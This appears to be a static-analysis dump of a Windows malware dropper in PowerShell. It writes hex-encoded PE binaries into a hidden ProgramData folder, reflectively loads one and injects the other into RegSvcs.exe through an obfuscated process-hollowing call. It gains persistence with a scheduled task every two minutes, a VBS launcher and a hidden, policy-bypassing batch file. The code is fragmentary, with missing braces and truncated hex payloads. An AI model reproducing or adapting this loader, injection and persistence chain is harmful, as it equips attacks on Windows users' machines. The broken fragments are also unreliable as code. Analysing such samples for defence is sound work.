Static Analysis

$hcga = "C:\ProgramData\qrhl"

New-Item $hcga -ItemType Directory -Force

$Content = @'

function olik {

param($gfdn)$gfdn = $gfdn -split '(..)' | ? { $_ }

ForEach ($pmqn in $gfdn)

[Convert]::ToInt32($pmqn,16)

$zqte = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300B18142AC0000000000000000E0000E210B013000008C000000060000000000003EAB00000020000000C0000000004000002000000002000004000000000000000600000000000000000001000002000000000000030060850000100000100000000010000010000000000000100000000000000000000000F0AA00004B00000000C00000540300000000000000000000000000000000000000E000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000448B000000200000008C000000020000000000000000000000000000200000602E727372630000005403000000C0000000040000008E0000000000000000000000000000400000402E72656C6F6300000C00000000E000000002000000920000000000000000000000000000400000420000000000000000000000

}catch{}

$lhtx = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300758F34640000000000000000E00002010B01080000F00000000A0000000000005E0E0100002000000020010000004000002000000002000004000000000000000400000000000000006001000002000000000000020060850000100000100000000010000010000000000000100000000000000000000000040E01005700000000200100FF07000000000000000000000000000000000000004001000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000064EE00000020000000F0000000020000000000000000000000000000200000602E72737263000000FF070000002001000008000000F20000000000000000000000000000400000402E72656C6F6300000C000000004001000002000000FA00000000000000000000000000004000004200000000000000000000000

}catch{}

[Byte[]] $olik = olik $pmqn

[Byte[]] $jutx = olik $zqte

[Byte[]] $tzkf = olik $lhtx

$wael = [Ref].Assembly

$csfa = $wael::'Load'(($jutx))

}catch{}

$ordy = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcclkgmtdowesvrxus.exe'

$csfa.'GetType'('NewclkgmtdowesvrxuPE.PE'.replace('clkgmtdowesvrxu','')).GetMethod('Exclkgmtdowesvrxuecuclkgmtdowesvrxute'.replace('clkgmtdowesvrxu','')).'Invoke'($null,($ordy.replace('clkgmtdowesvrxu',''),$tzkf))

$null,[object[]] ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null, $ordy

}catch{}

[IO.File]::WriteAllText("C:\ProgramData\qrhl\pvfu.ps1", $Content)

Sleep 1

$Content = @'

&'schtasks.exe' '/create' '/sc' 'minute' '/mo' 2 '/tn' ''qrhl '/tr' (('C:\ProgramData\qrhl\qrhl.vbs'));

} catch { }

[IO.File]::WriteAllText("C:\ProgramData\qrhl\qrhl.ps1", $Content)

$Content = @'

on error resume next

WScript.Sleep 10000

set gmky = CreateObject("WScript.Shell")

gmky.run "C:\ProgramData\qrhl\1.bat",0

[IO.File]::WriteAllText("C:\ProgramData\qrhl\qrhl.vbs", $Content)

$Content = @'

CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\qrhl\pvfu.ps1"

[IO.File]::WriteAllText("C:\ProgramData\qrhl\1.bat", $Content)

Start-Sleep 11

$jgfc = 'ReadAllText'.Replace('!','');

IEX([IO.File]::$jgfc('C:\ProgramData\qrhl\qrhl.ps1'))